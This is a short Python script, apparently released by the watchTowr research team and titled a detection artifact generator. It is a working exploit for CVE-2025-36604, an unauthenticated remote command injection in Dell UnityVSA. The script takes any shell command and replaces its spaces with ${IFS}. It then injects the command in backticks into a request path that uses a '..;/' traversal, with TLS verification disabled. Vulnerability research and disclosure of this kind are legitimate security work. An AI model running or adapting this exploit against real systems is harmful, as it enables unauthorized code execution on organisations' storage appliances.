import argparse
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def exploit(target, command):
    target = target.rstrip("/")
    command = command.replace(" ", "${IFS}")
    requests.get(f"{target}/misc/`{command}`/..;/index.html", verify=False, timeout=2)
    print(f"[+] Sent exploit to {target}")
banner = """			 __         ___  ___________                   
	 __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________ 
	 \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
	  \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
	   \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
				  \\/          \\/     \\/                            

        watchTowr-vs-Dell-UnityVSA-CVE-2025-36604.py

        (*) Dell UnityVSA Unauthenticated Remote Command Injection Detection Artifact Generator
        
          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-36604]
"""
print(banner)

parser = argparse.ArgumentParser(description="Detection Artifact Generator for CVE-2025-36604")
parser.add_argument('-r', '--target', required=True, help='Target IP address')
parser.add_argument('-c', '--command', required=False, default="", help='Command to execute')
args = parser.parse_args()

exploit(args.target, args.command)